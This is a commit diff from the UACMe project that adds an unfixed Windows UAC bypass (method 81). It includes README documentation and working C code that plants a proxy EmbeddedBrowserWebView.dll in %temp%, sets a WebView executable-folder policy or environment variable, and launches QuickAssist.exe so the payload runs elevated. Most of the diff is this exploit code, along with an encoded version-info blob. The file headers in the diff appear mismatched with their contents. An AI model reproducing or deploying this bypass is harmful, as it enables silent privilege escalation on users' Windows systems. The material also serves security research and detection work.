v 3.6.8

Method 81 added, see #162  for more info;
Readme updated.

Author: hfiref0x

README.md

@@ -825,6 +825,17 @@ First parameter is number of method to use, second is optional command (executab
      * Fixed in: unfixed :see_no_evil:
         * How: -
       * Code status: added in v3.6.7
+81. Author: R41N3RZUF477
+     * Type: Shell API
+     * Method: Environment variables expansion, Dll Hijack, UIPI bypass
+     * Target(s): \system32\QuickAssist.exe
+     * Component(s): EmbeddedBrowserWebView.dll
+     * Implementation: ucmQuickAssistMethod
+     * Works from: Windows 10 (19041)
+     * AlwaysNotify compatible
+     * Fixed in: unfixed :see_no_evil:
+        * How: -
+      * Code status: added in v3.6.8
 
 </details>
 

Source/Akagi/Resource.rc

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2016 - 2022
+*  (C) COPYRIGHT AUTHORS, 2016 - 2025
 *
 *  TITLE:       ENCRESOURCE.H
 *
-*  VERSION:     3.61
+*  VERSION:     3.68
 *
-*  DATE:        22 Jun 2022
+*  DATE:        07 Mar 2025
 *
 *  Encoded string resources.
 *
@@ -15,6 +15,7 @@
 *  3) g_encodedRecentViews - eventvwr cache element generated with yososerial
 *  4) g_encodedRecentViewsV2 - eventvwr cache element for dotnet2 generated with ysoserial
 *  5) g_encodedTaskParamBegin, g_encodedTaskParamEnd - parameters data for the scheduler task
+*  6) g_webviewvsinfo - WebView version info block
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -915,3 +916,83 @@ static const unsigned char g_encodedTaskParamEnd[69] = {
 	0x1E, 0xE0, 0xB2, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x5B, 0xE8, 0x85, 0xA3, 0x27, 0x8C, 0x6B, 0x30,
 	0x0A, 0xC2, 0xBA, 0x09, 0x12
 };
+
+static const unsigned char g_webviewvsinfo[1224] = {
+	0xBB, 0xE2, 0xF9, 0x9B, 0x37, 0x6E, 0x8A, 0xB8, 0x22, 0xE2, 0x9A, 0x8B, 0x40, 0x2C, 0x1D, 0xB0,
+	0x33, 0xC2, 0xD6, 0x0B, 0x5E, 0x2E, 0x13, 0xB9, 0x3D, 0xE6, 0x92, 0x9B, 0x7E, 0x6E, 0x92, 0xB9,
+	0x35, 0xE6, 0x82, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0xCC, 0xE6, 0x2A, 0x75, 0x16, 0x2C, 0x59, 0xB0,
+	0x61, 0xC2, 0x84, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCC, 0x9B, 0x37, 0x6E, 0xDC, 0xB9,
+	0x4C, 0xE6, 0xCD, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0x75, 0xE2, 0xC5, 0x8B, 0x14, 0x2C, 0x58, 0xB0,
+	0x61, 0xC2, 0x85, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6A, 0xDC, 0xB9,
+	0x73, 0xE6, 0x9E, 0x9B, 0x43, 0x6E, 0xAE, 0xB8, 0x18, 0xE2, 0xAB, 0x8B, 0x71, 0x2C, 0x1E, 0xB0,
+	0x08, 0xC2, 0xE9, 0x0B, 0x72, 0x2E, 0x15, 0xB9, 0x1D, 0xE6, 0xAB, 0x9B, 0x58, 0x6E, 0xDC, 0xB9,
+	0x77, 0xE2, 0xCD, 0x9B, 0x37, 0x6E, 0xEC, 0xB8, 0x45, 0xE2, 0xF5, 0x8B, 0x2F, 0x2C, 0x68, 0xB0,
+	0x55, 0xC2, 0xC7, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x3F, 0xE6, 0xE1, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,
+	0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x58, 0x2C, 0x39, 0xB0,
+	0x0C, 0xC2, 0xE0, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB9,
+	0x1C, 0xE6, 0xBE, 0x9B, 0x58, 0x6E, 0xBA, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x37, 0xB0,
+	0x13, 0xC2, 0xF5, 0x0B, 0x78, 0x2E, 0x2E, 0xB9, 0x12, 0xE6, 0xB9, 0x9B, 0x5E, 0x6E, 0xB3, 0xB9,
+	0x1D, 0xE6, 0xCD, 0x9B, 0xBF, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x83, 0x8B, 0x7F, 0x2C, 0x34, 0xB0,
+	0x04, 0xC2, 0xC1, 0x0B, 0x72, 0x2E, 0x2F, 0xB9, 0x10, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xAC, 0xB9,
+	0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,
+	0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,
+	0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB8, 0x51, 0xE2, 0x80, 0x8B, 0x7B, 0x2C, 0x3A, 0xB0,
+	0x04, 0xC2, 0xE1, 0x0B, 0x73, 0x2E, 0x39, 0xB9, 0x17, 0xE6, 0xED, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,
+	0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0xE5, 0x8B, 0x41, 0x2C, 0x3D, 0xB0,
+	0x03, 0xC2, 0xD3, 0x0B, 0x7E, 0x2E, 0x39, 0xB9, 0x04, 0xE6, 0xED, 0x9B, 0x74, 0x6E, 0xB0, 0xB9,
+	0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x26, 0x2C, 0x48, 0xB0,
+	0x60, 0xC2, 0xC3, 0x0B, 0x7E, 0x2E, 0x30, 0xB9, 0x16, 0xE6, 0x9B, 0x9B, 0x52, 0x6E, 0xAE, 0xB9,
+	0x00, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x27, 0x2C, 0x76, 0xB0,
+	0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x72, 0xB9, 0x43, 0xE6, 0xCD, 0x9B, 0x6F, 0x6E, 0xEA, 0xB9,
+	0x72, 0xE6, 0x84, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x14, 0xE2, 0xB7, 0x8B, 0x78, 0x2C, 0x39, 0xB0,
+	0x0D, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x72, 0x6E, 0xB1, 0xB9,
+	0x11, 0xE6, 0xA8, 0x9B, 0x53, 0x6E, 0xB8, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,
+	0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0x9A, 0x9B, 0x52, 0x6E, 0xBE, 0xB9,
+	0x25, 0xE6, 0xA4, 0x9B, 0x52, 0x6E, 0xAB, 0xB8, 0x5F, 0xE2, 0xA1, 0x8B, 0x7A, 0x2C, 0x34, 0xB0,
+	0x61, 0xC2, 0x85, 0x0B, 0x87, 0x2E, 0x30, 0xB9, 0x72, 0xE6, 0x81, 0x9B, 0x52, 0x6E, 0xBB, 0xB9,
+	0x12, 0xE6, 0xA1, 0x9B, 0x74, 0x6E, 0xB3, 0xB8, 0x01, 0xE2, 0xBC, 0x8B, 0x64, 0x2C, 0x31, 0xB0,
+	0x06, 0xC2, 0xED, 0x0B, 0x63, 0x2E, 0x5C, 0xB9, 0x30, 0xE6, 0xA2, 0x9B, 0x47, 0x6E, 0xA5, 0xB9,
+	0x01, 0xE6, 0xA4, 0x9B, 0x50, 0x6E, 0xB4, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,
+	0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,
+	0x30, 0xE6, 0xA2, 0x9B, 0x45, 0x6E, 0xAC, 0xB8, 0x1E, 0xE2, 0xB7, 0x8B, 0x77, 0x2C, 0x2C, 0xB0,
+	0x08, 0xC2, 0xEA, 0x0B, 0x79, 0x2E, 0x72, 0xB9, 0x53, 0xE6, 0x8C, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,
+	0x53, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xBB, 0xB8, 0x19, 0xE2, 0xB1, 0x8B, 0x65, 0x2C, 0x78, 0xB0,
+	0x13, 0xC2, 0xE0, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xBB, 0x9B, 0x52, 0x6E, 0xB8, 0xB9,
+	0x5D, 0xE6, 0xCD, 0x9B, 0x57, 0x6E, 0xEA, 0xB8, 0x70, 0xE2, 0x8A, 0x8B, 0x64, 0x2C, 0x31, 0xB0,
+	0x06, 0xC2, 0xEC, 0x0B, 0x79, 0x2E, 0x3D, 0xB9, 0x1F, 0xE6, 0x8B, 0x9B, 0x5E, 0x6E, 0xB0, 0xB9,
+	0x16, 0xE6, 0xA3, 0x9B, 0x56, 0x6E, 0xB1, 0xB8, 0x14, 0xE2, 0xC5, 0x8B, 0x53, 0x2C, 0x35, 0xB0,
+	0x03, 0xC2, 0xE0, 0x0B, 0x73, 0x2E, 0x38, 0xB9, 0x16, 0xE6, 0xA9, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,
+	0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0x92, 0x8B, 0x73, 0x2C, 0x3A, 0xB0,
+	0x37, 0xC2, 0xEC, 0x0B, 0x72, 0x2E, 0x2B, 0xB9, 0x5D, 0xE6, 0xA9, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,
+	0x73, 0xE6, 0xCD, 0x9B, 0xB7, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,
+	0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x3D, 0xE6, 0xAC, 0x9B, 0x5A, 0x6E, 0xB9, 0xB9,
+	0x73, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB8, 0x12, 0xE2, 0xB7, 0x8B, 0x79, 0x2C, 0x2B, 0xB0,
+	0x0E, 0xC2, 0xE3, 0x0B, 0x63, 0x2E, 0x7C, 0xB9, 0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB9,
+	0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x72, 0x2C, 0x3D, 0xB0,
+	0x05, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x2E, 0xB9, 0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB9,
+	0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB8, 0x13, 0xE2, 0x93, 0x8B, 0x7F, 0x2C, 0x3D, 0xB0,
+	0x16, 0xC2, 0xA5, 0x0B, 0x54, 0x2E, 0x30, 0xB9, 0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB9,
+	0x73, 0xE6, 0xCD, 0x9B, 0x03, 0x6E, 0xCC, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,
+	0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x25, 0xE6, 0xA8, 0x9B, 0x45, 0x6E, 0xAF, 0xB9,
+	0x1A, 0xE6, 0xA2, 0x9B, 0x59, 0x6E, 0xDC, 0xB8, 0x40, 0xE2, 0xEB, 0x8B, 0x26, 0x2C, 0x76, 0xB0,
+	0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x4F, 0xE6, 0xD9, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,
+	0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x45, 0x2C, 0x30, 0xB0,
+	0x0E, 0xC2, 0xF7, 0x0B, 0x63, 0x2E, 0x12, 0xB9, 0x12, 0xE6, 0xA0, 0x9B, 0x52, 0x6E, 0xDC, 0xB9,
+	0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB8, 0x1E, 0xE2, 0xB6, 0x8B, 0x79, 0x2C, 0x3E, 0xB0,
+	0x15, 0xC2, 0x85, 0x0B, 0x9F, 0x2E, 0x02, 0xB9, 0x72, 0xE6, 0x9D, 0x9B, 0x45, 0x6E, 0xB3, 0xB9,
+	0x17, 0xE6, 0xB8, 0x9B, 0x54, 0x6E, 0xA8, 0xB8, 0x22, 0xE2, 0xAD, 0x8B, 0x79, 0x2C, 0x2A, 0xB0,
+	0x15, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB9,
+	0x10, 0xE6, 0xBF, 0x9B, 0x58, 0x6E, 0xAF, 0xB8, 0x1E, 0xE2, 0xA3, 0x8B, 0x62, 0x2C, 0x78, 0xB0,
+	0x24, 0xC2, 0xE1, 0x0B, 0x70, 0x2E, 0x39, 0xB9, 0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB9,
+	0x16, 0xE6, 0xA9, 0x9B, 0x53, 0x6E, 0xB9, 0xB8, 0x15, 0xE2, 0xE5, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,
+	0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB9,
+	0x11, 0xE6, 0x9B, 0x9B, 0x5E, 0x6E, 0xB9, 0xB8, 0x06, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x34, 0xB0,
+	0x08, 0xC2, 0xE0, 0x0B, 0x79, 0x2E, 0x28, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6E, 0xD8, 0xB9,
+	0x72, 0xE6, 0x82, 0x9B, 0x51, 0x6E, 0xBA, 0xB8, 0x18, 0xE2, 0xA6, 0x8B, 0x7F, 0x2C, 0x39, 0xB0,
+	0x0D, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x29, 0xB9, 0x1A, 0xE6, 0xA1, 0x9B, 0x53, 0x6E, 0xDC, 0xB9,
+	0x42, 0xE6, 0xCD, 0x9B, 0x73, 0x6E, 0xDC, 0xB8, 0x71, 0xE2, 0x93, 0x8B, 0x77, 0x2C, 0x2A, 0xB0,
+	0x27, 0xC2, 0xEC, 0x0B, 0x7B, 0x2E, 0x39, 0xB9, 0x3A, 0xE6, 0xA3, 0x9B, 0x51, 0x6E, 0xB3, 0xB9,
+	0x73, 0xE6, 0xCD, 0x9B, 0x13, 0x6E, 0xD8, 0xB8, 0x71, 0xE2, 0x91, 0x8B, 0x64, 0x2C, 0x39, 0xB0,
+	0x0F, 0xC2, 0xF6, 0x0B, 0x7B, 0x2E, 0x3D, 0xB9, 0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB9,
+	0x73, 0xE6, 0xCD, 0x9B, 0x3E, 0x6A, 0x6C, 0xBC
+};

Source/Akagi/encresource.h

@@ -4,9 +4,9 @@
 *
 *  TITLE:       HYBRIDS.C
 *
-*  VERSION:     3.67
+*  VERSION:     3.68
 *
-*  DATE:        11 Feb 2025
+*  DATE:        07 Mar 2025
 *
 *  Hybrid UAC bypass methods.
 *
@@ -1504,3 +1504,183 @@ NTSTATUS ucmRequestTraceMethod(
 
     return MethodResult;
 }
+
+
+/*
+* ucmxModifyWebviewExecutableFolderPolicy
+*
+* Purpose:
+*
+* Alter WebView BrowserExecutableFolder parameter.
+*
+*/
+BOOLEAN ucmxModifyWebviewExecutableFolderPolicy(
+    _In_ LPCWSTR lpPayloadPath
+)
+{
+    BOOLEAN bResult = FALSE;
+    HKEY hKey = NULL;
+
+    if (ERROR_SUCCESS == RegCreateKeyEx(HKEY_CURRENT_USER,
+        T_WEBVIEW_POLICY,
+        0, NULL,
+        REG_OPTION_VOLATILE,
+        MAXIMUM_ALLOWED,
+        NULL,
+        &hKey,
+        NULL))
+    {
+        bResult = (RegSetValueEx(hKey,
+            QUICKASSIST_EXE,
+            0, REG_SZ,
+            (const BYTE*)lpPayloadPath,
+            ((DWORD)_strlen(lpPayloadPath) * sizeof(WCHAR)) + sizeof(UNICODE_NULL)) == ERROR_SUCCESS);
+
+        RegCloseKey(hKey);
+    }
+
+    return bResult;
+}
+
+/*
+* ucmxRunQuickAssist
+*
+* Purpose:
+*
+* Execute quick assist through direct exe start or protocol.
+*
+*/
+HANDLE ucmxRunQuickAssist()
+{
+    WCHAR szBuffer[MAX_PATH * 2];
+    SHELLEXECUTEINFOW shinfo;
+
+    _strcpy(szBuffer, g_ctx->szSystemDirectory);
+    _strcat(szBuffer, QUICKASSIST_EXE);
+
+    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
+    shinfo.cbSize = sizeof(shinfo);
+    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+    shinfo.lpVerb = NULL;
+    shinfo.lpParameters = NULL;
+    shinfo.nShow = SW_MINIMIZE;
+
+    if (GetFileAttributesW(szBuffer) != INVALID_FILE_ATTRIBUTES) {
+        shinfo.lpFile = szBuffer;
+    }
+    else {
+        shinfo.lpFile = T_QUICKASSIST;
+    }
+
+    if (ShellExecuteEx(&shinfo)) {
+        return shinfo.hProcess;
+    }
+
+    return NULL;
+}
+
+/*
+* ucmQuickAssistMethod
+*
+* Purpose:
+*
+* Bypass UAC by environment variables hijack and dll planting.
+* https://github.com/R41N3RZUF477/QuickAssist_UAC_Bypass
+*
+*/
+NTSTATUS ucmQuickAssistMethod(
+    _In_ PVOID ProxyDll,
+    _In_ DWORD ProxyDllSize
+)
+{
+    BOOL fDirCreated = FALSE, fEnvSet = FALSE;
+    HANDLE hProcess;
+    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
+    WCHAR szPayloadPath[MAX_PATH * 2];
+    WCHAR szPayloadFile[MAX_PATH * 2];
+
+    do {
+
+        //
+        // Select payload entry point.
+        //
+        if (!supReplaceDllEntryPoint(
+            ProxyDll,
+            ProxyDllSize,
+            FUBUKI_ENTRYPOINT_QASSIST,
+            FALSE))
+        {
+            break;
+        }
+
+        //
+        // Create destination dir "EBWebView\x64" in %temp%.
+        //
+        _strcpy(szPayloadPath, g_ctx->szTempDirectory);
+        _strcat(szPayloadPath, WEBVIEW_DIR);
+        if (!CreateDirectory(szPayloadPath, NULL)) {
+            if (GetLastError() != ERROR_ALREADY_EXISTS)
+                break;
+        }
+
+        _strcat(szPayloadPath, L"\\x64");
+        if (!CreateDirectory(szPayloadPath, NULL)) {
+            if (GetLastError() != ERROR_ALREADY_EXISTS)
+                break;
+        }
+
+        //
+        // Drop payload and alter it version info block.
+        //
+        _strcpy(szPayloadFile, szPayloadPath);
+        _strcat(szPayloadFile, TEXT("\\"));
+        _strcat(szPayloadFile, EMBEDDEDBROWSERWEBVIEW_DLL);
+        if (!supWriteBufferToFile(szPayloadFile, ProxyDll, ProxyDllSize))
+            break;
+
+        fDirCreated = TRUE;
+
+        if (!supReplaceVersionInfo(szPayloadFile, (PBYTE)g_webviewvsinfo, sizeof(g_webviewvsinfo), 'qass'))
+            break;
+
+        //
+        // Relay WebView.
+        //
+        if (!ucmxModifyWebviewExecutableFolderPolicy(szPayloadPath)) {
+            fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, g_ctx->szTempDirectory);
+            if (fEnvSet == FALSE)
+                break;
+        }
+
+        //
+        // Run quick asssist.
+        //
+        hProcess = ucmxRunQuickAssist();
+        if (hProcess == NULL)
+            break;
+
+        if (WaitForSingleObject(hProcess, 15000) != WAIT_OBJECT_0) {
+            TerminateProcess(hProcess, 0);
+            CloseHandle(hProcess);
+            break;
+        }
+
+        MethodResult = STATUS_SUCCESS;
+
+    } while (FALSE);
+
+    supSetGlobalCompletionEvent();
+
+    Sleep(1000);
+
+    if (fEnvSet)
+        supSetEnvVariable(TRUE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, NULL);
+
+    if (fDirCreated) {
+        _strcpy(szPayloadPath, g_ctx->szTempDirectory);
+        _strcat(szPayloadPath, WEBVIEW_DIR);
+        supRemoveDirectoryRecursive(szPayloadPath);
+    }
+
+    return MethodResult;
+}

Source/Akagi/methods/hybrids.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       METHODS.C
 *
-*  VERSION:     3.67
+*  VERSION:     3.68
 *
-*  DATE:        11 Feb 2025
+*  DATE:        07 Mar 2025
 *
 *  UAC bypass dispatch.
 *
@@ -53,6 +53,7 @@ UCM_API(MethodIscsiCpl);
 UCM_API(MethodAtlHijack);
 UCM_API(MethodSspiDatagram);
 UCM_API(MethodRequestTrace);
+UCM_API(MethodQuickAssist);
 
 ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
     UacMethodWow64Logger,
@@ -69,7 +70,8 @@ ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
     UacMethodVFServerDiagProf,
     UacMethodAtlHijack,
     UacMethodSspiDatagram,
-    UacMethodRequestTrace
+    UacMethodRequestTrace,
+    UacMethodQuickAssist
 };
 
 UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
@@ -153,7 +155,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
     { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
     { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
     { MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
-    { MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
+    { MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
+    { MethodQuickAssist, { NT_WIN10_REDSTONE5, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
 };
 
 /*
@@ -870,3 +873,15 @@ UCM_API(MethodRequestTrace)
     return STATUS_NOT_SUPPORTED;
 #endif
 }
+
+UCM_API(MethodQuickAssist)
+{
+#ifdef _WIN64
+    return ucmQuickAssistMethod(
+        Parameter->PayloadCode,
+        Parameter->PayloadSize);
+#else
+    UNREFERENCED_PARAMETER(Parameter);
+    return STATUS_NOT_SUPPORTED;
+#endif
+}

Source/Akagi/methods/methods.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       METHODS.H
 *
-*  VERSION:     3.67
+*  VERSION:     3.68
 *
-*  DATE:        11 Feb 2025
+*  DATE:        07 Mar 2025
 *
 *  Prototypes and definitions for UAC bypass methods table.
 *
@@ -100,6 +100,7 @@ typedef enum _UCM_METHOD {
     UacMethodSspiDatagram,      //+
     UacMethodTokenModUiAccess2, //+
     UacMethodRequestTrace,      //+
+    UacMethodQuickAssist,       //+
     UacMethodMax,
     UacMethodInvalid = 0xabcdef
 } UCM_METHOD;